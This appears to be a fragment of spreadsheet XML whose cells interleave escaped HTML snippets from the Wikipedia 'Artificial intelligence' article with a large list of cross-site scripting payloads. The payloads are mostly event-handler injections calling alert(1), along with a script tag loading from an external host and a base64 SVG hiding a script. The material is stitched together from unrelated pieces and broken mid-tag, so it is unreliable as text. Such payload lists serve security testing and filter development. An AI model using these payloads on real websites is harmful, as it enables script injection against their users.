title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//www.ncbi.nlm.nih.gov/pmc/articles/PMC1513681"&gt;1513681 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" 									onanimationiteration="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; See also &lt;a rel="nofollow" class="external text" href="http://consc.net/papers/facing.html"&gt;this link &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;p id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>setTimeout(</t>
  </si>
  <si>
    <t>&lt;basefont draggable="true" ondragend="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onbeforepaste="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computationalism" class="mw-redirect" title="Computationalism"&gt;Computationalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rb id=x tabindex=1 onfocus=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLungarellaMettaPfeiferSandini2003" class="citation journal"&gt;Lungarella, M.; Metta, G.; Pfeifer, R.; Sandini, G. (2003). "Developmental robotics: a survey". &lt;i&gt;Connection Science &lt;/i&gt;. &lt;b&gt;15 &lt;/b&gt; (4): 151–190. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.83.7615"&gt;10.1.1.83.7615 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;body onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointerleave=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;meter onmousedown="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;div onbeforepaste="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointerover=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;element id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/element&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;html id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;textarea draggable="true" ondragleave="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+New+York+Times&amp;amp;rft.atitle=Pentagon+Wants+Silicon+Valley%27s+Help+on+A.I.&amp;amp;rft.date=2018-03-15&amp;amp;rft.aulast=Metz&amp;amp;rft.aufirst=Cade&amp;amp;rft_id=https%3A%2F%2Fwww.nytimes.com%2F2018%2F03%2F15%2Ftechnology%2Fmilitary-artificial-intelligence.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Alan_Bundy" title="Alan Bundy"&gt;Bundy, Alan &lt;/a&gt; (1980). &lt;i&gt;Artificial Intelligence: An Introductory Course &lt;/i&gt; (2nd ed.). Edinburgh University Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-85224-410-4" title="Special:BookSources/978-0-85224-410-4"&gt;&lt;bdi&gt;978-0-85224-410-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+An+Introductory+Course&amp;amp;rft.edition=2nd&amp;amp;rft.pub=Edinburgh+University+Press&amp;amp;rft.date=1980&amp;amp;rft.isbn=978-0-85224-410-4&amp;amp;rft.aulast=Bundy&amp;amp;rft.aufirst=Alan&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;mark oncut="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;legend onclick="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;bgsound style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onbeforecopy="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;tr oncontextmenu="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;sub ondragover=alert(1) contenteditable&gt;drop here&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;dt onblur=alert(1) tabindex=1 id=x&gt;&lt;/dt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;details id=x tabindex=1 onfocus=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;strike ondblclick="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;ol onmousemove="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-vinyals2016-273"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-vinyals2016_273-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;acronym id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Bayesian_decision_theory" class="mw-redirect" title="Bayesian decision theory"&gt;Bayesian decision theory &lt;/a&gt; and Bayesian &lt;a href="/wiki/Decision_network" class="mw-redirect" title="Decision network"&gt;decision networks &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/cs.CL"&gt;cs.CL &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Sequence+to+Sequence+Learning+with+Neural+Networks&amp;amp;rft.date=2014&amp;amp;rft_id=info%3Aarxiv%2F1409.3215&amp;amp;rft.aulast=Sutskever&amp;amp;rft.aufirst=Ilya&amp;amp;rft.au=Vinyals%2C+Oriol&amp;amp;rft.au=Le%2C+Quoc+V.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Overfitted_Data.png" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/6/68/Overfitted_Data.png/220px-Overfitted_Data.png" decoding="async" width="220" height="149" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/6/68/Overfitted_Data.png/330px-Overfitted_Data.png 1.5x, //upload.wikimedia.org/wikipedia/commons/6/68/Overfitted_Data.png 2x" data-file-width="377" data-file-height="256" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;keygen draggable="true" ondrag="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;pre id=x tabindex=1 onactivate=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;noframes id=x tabindex=1 onactivate=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;p id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/p&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;abbr oncopy="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;image style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;sup onkeyup="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Progress_in_artificial_intelligence" title="Progress in artificial intelligence"&gt;Progress in artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;footer onbeforecopy="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;code ondragover=alert(1) contenteditable&gt;drop here&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;frameset oncontextmenu="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mental_image" title="Mental image"&gt;Mental image &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dl id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/technology/2016/feb/16/demis-hassabis-artificial-intelligence-deepmind-alphago"&gt;"The superhero of artificial intelligence: can this genius keep it in check?" &lt;/a&gt;. &lt;i&gt;the Guardian &lt;/i&gt;. 16 February 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;26 April </t>
  </si>
  <si>
    <t>&lt;pre onbeforecopy="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;/li&gt;&lt;li style="min-height: 31px;"&gt;&lt;span style="display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/23px-Wikiquote-logo.svg.png" decoding="async" width="23" height="27" style="vertical-align: middle" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/35px-Wikiquote-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/46px-Wikiquote-logo.svg.png 2x" data-file-width="300" data-file-height="355" /&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;227–243, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Didrachm_Phaistos_obverse_CdM.jpg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/c/c8/Didrachm_Phaistos_obverse_CdM.jpg/220px-Didrachm_Phaistos_obverse_CdM.jpg" decoding="async" width="220" height="220" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/c/c8/Didrachm_Phaistos_obverse_CdM.jpg/330px-Didrachm_Phaistos_obverse_CdM.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/c/c8/Didrachm_Phaistos_obverse_CdM.jpg/440px-Didrachm_Phaistos_obverse_CdM.jpg 2x" data-file-width="1020" data-file-height="1020" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;rb onload=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=46" title="Edit section: Advertising"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;option id=x tabindex=1 onfocus=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Harvard+Business+Review&amp;amp;rft.atitle=10+Promising+AI+Applications+in+Health+Care&amp;amp;rft.date=2018-05-10&amp;amp;rft_id=https%3A%2F%2Fhbr.org%2F2018%2F05%2F10-promising-ai-applications-in-health-care&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;table onbeforecut="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Industrial_robot" title="Industrial robot"&gt;Industrial &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Social justice </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-335"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-335"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;tfoot oncontextmenu="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;noembed onload=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT/SRC="http://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;base id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/base&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2009 </t>
  </si>
  <si>
    <t>&lt;hgroup onmouseover="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;big onbeforepaste="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;object oncopy="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Formal_language" title="Formal language"&gt;Formal language &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;td draggable="true" ondragleave="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;s onkeypress="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;source onbeforecut="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;script id=x tabindex=1 onactivate=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 4.2, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;details onkeyup="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;According to &lt;a href="/wiki/Bloomberg_News" title="Bloomberg News"&gt;Bloomberg's &lt;/a&gt; Jack Clark, 2015 was a landmark year for artificial intelligence, with the number of software projects that use AI &lt;a href="/wiki/Google" title="Google"&gt;Google &lt;/a&gt; increased from a "sporadic usage" in 2012 to more than 2,700 projects. Clark also presents factual data indicating the improvements of AI since 2012 supported by lower error rates in image processing tasks.&lt;sup id="cite_ref-:0_53-0" class="reference"&gt;&lt;a href="#cite_note-:0-53"&gt;&amp;#91;53&amp;#93; &lt;/a&gt; &lt;/sup&gt; He attributes this to an increase in affordable &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;neural networks &lt;/a&gt;, due to a rise in cloud computing infrastructure and to an increase in research tools and datasets.&lt;sup id="cite_ref-AI_in_2000s_13-2" class="reference"&gt;&lt;a href="#cite_note-AI_in_2000s-13"&gt;&amp;#91;13&amp;#93; &lt;/a&gt; &lt;/sup&gt; Other cited examples include Microsoft's development of a Skype system that can automatically translate from one language to another and Facebook's system that can describe images to blind people.&lt;sup id="cite_ref-:0_53-1" class="reference"&gt;&lt;a href="#cite_note-:0-53"&gt;&amp;#91;53&amp;#93; &lt;/a&gt; &lt;/sup&gt; In a 2017 survey, one in five companies reported they had "incorporated AI in some offerings or processes".&lt;sup id="cite_ref-54" class="reference"&gt;&lt;a href="#cite_note-54"&gt;&amp;#91;54&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-55" class="reference"&gt;&lt;a href="#cite_note-55"&gt;&amp;#91;55&amp;#93; &lt;/a&gt; &lt;/sup&gt; Around 2016, &lt;a href="/wiki/China" title="China"&gt;China &lt;/a&gt; greatly accelerated its government funding; given its large supply of data and its rapidly increasing research output, some observers believe it may be on track to becoming an "AI superpower".&lt;sup id="cite_ref-56" class="reference"&gt;&lt;a href="#cite_note-56"&gt;&amp;#91;56&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-57" class="reference"&gt;&lt;a href="#cite_note-57"&gt;&amp;#91;57&amp;#93; &lt;/a&gt; &lt;/sup&gt; However, it has been acknowledged that reports regarding artificial intelligence have tended to be exaggerated.&lt;sup id="cite_ref-58" class="reference"&gt;&lt;a href="#cite_note-58"&gt;&amp;#91;58&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-59" class="reference"&gt;&lt;a href="#cite_note-59"&gt;&amp;#91;59&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-60" class="reference"&gt;&lt;a href="#cite_note-60"&gt;&amp;#91;60&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;noscript id=x tabindex=1 onfocus=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Artificial_neural_networks"&gt;Artificial neural networks </t>
  </si>
  <si>
    <t>&lt;abbr onkeyup="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onbeforepaste="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Chalmers-401"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Chalmers_401-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;figure id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/figure&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body class="mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject mw-editable page-Artificial_intelligence rootpage-Artificial_intelligence skin-vector action-view"&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;266–276, 298–300, 314, 421 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blink onkeydown="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;video onmousemove="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;noembed oncontextmenu="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;hr ondragover=alert(1) contenteditable&gt;drop here&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The long-term economic effects of AI are uncertain. A survey of economists showed disagreement about whether the increasing use of robots and AI will cause a substantial increase in long-term &lt;a href="/wiki/Unemployment" title="Unemployment"&gt;unemployment &lt;/a&gt;, but they generally agree that it could be a net benefit, if &lt;a href="/wiki/Productivity" title="Productivity"&gt;productivity &lt;/a&gt; gains are &lt;a href="/wiki/Redistribution_of_income_and_wealth" title="Redistribution of income and wealth"&gt;redistributed &lt;/a&gt;.&lt;sup id="cite_ref-413" class="reference"&gt;&lt;a href="#cite_note-413"&gt;&amp;#91;401&amp;#93; &lt;/a&gt; &lt;/sup&gt; A February 2020 European Union white paper on artificial intelligence advocated for artificial intelligence for economic benefits, including "improving healthcare (e.g. making diagnosis more  precise,  enabling  better  prevention  of  diseases), increasing  the  efficiency  of  farming,contributing  to climate  change mitigation  and  adaptation, [and] improving  the  efficiency  of production systems through predictive maintenance", while acknowledging potential risks.&lt;sup id="cite_ref-:1_290-1" class="reference"&gt;&lt;a href="#cite_note-:1-290"&gt;&amp;#91;279&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;table id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpaste="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;&lt;a href="/wiki/Index_of_philosophy_of_science_articles" title="Index of philosophy of science articles"&gt;Related topics &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;command onmousemove="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Decrease_in_demand_for_human_labor"&gt;Decrease in demand for human labor </t>
  </si>
  <si>
    <t>&lt;noembed draggable="true" ondragstart="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;br onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/br&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onpointerup=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-63"&gt;&lt;a href="#Strong_AI_hypothesis"&gt;&lt;span class="tocnumber"&gt;8.4.3 </t>
  </si>
  <si>
    <t>&lt;ruby onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ruby&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;hr id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;section onmousemove="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmousemove="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;section draggable="true" ondrag="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;article ondrop=alert(1) contenteditable&gt;drop here&lt;/article&gt;</t>
  </si>
  <si>
    <t>RC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"</t>
  </si>
  <si>
    <t>&lt;hgroup onpointermove=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ruby oncontextmenu="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;map draggable="true" ondrag="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;tt draggable="true" ondragenter="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dt style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Anti-logic_or_scruffy"&gt;Anti-logic or scruffy </t>
  </si>
  <si>
    <t>&lt;meta onpointerover=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a rel="nofollow" class="external text" href="http://news.bbc.co.uk/2/hi/business/1481339.stm"&gt;Robots Beat Humans in Trading Battle. &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20090909001249/http://news.bbc.co.uk/2/hi/business/1481339.stm"&gt;Archived &lt;/a&gt; 9 September 2009 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; BBC.com (8 August 2001) </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;tr oncut="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; on 18 January 2013. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=International+Journal+of+Information+Technology+and+Knowledge+Management&amp;amp;rft.atitle=Artificial+Intelligence+%E2%80%93+Man+or+Machine&amp;amp;rft.volume=4&amp;amp;rft.issue=1&amp;amp;rft.pages=173-176&amp;amp;rft.date=2011&amp;amp;rft.aulast=Rajani&amp;amp;rft.aufirst=Sandeep&amp;amp;rft_id=http%3A%2F%2Fwww.csjournals.com%2FIJITKM%2FPDF%25204-1%2F35.Sandeep%2520Rajani.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;hr id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;sup id="cite_ref-137" class="reference"&gt;&lt;a href="#cite_note-137"&gt;&amp;#91;134&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;content onpaste="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;s oncontextmenu="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointerleave=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;style style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/figcaption&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;pre onload=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;figure oncopy="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;dd id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTE&amp;#39;&amp;#39;Kismet&amp;#39;&amp;#39;-136"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTE&amp;#39;&amp;#39;Kismet&amp;#39;&amp;#39;_136-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
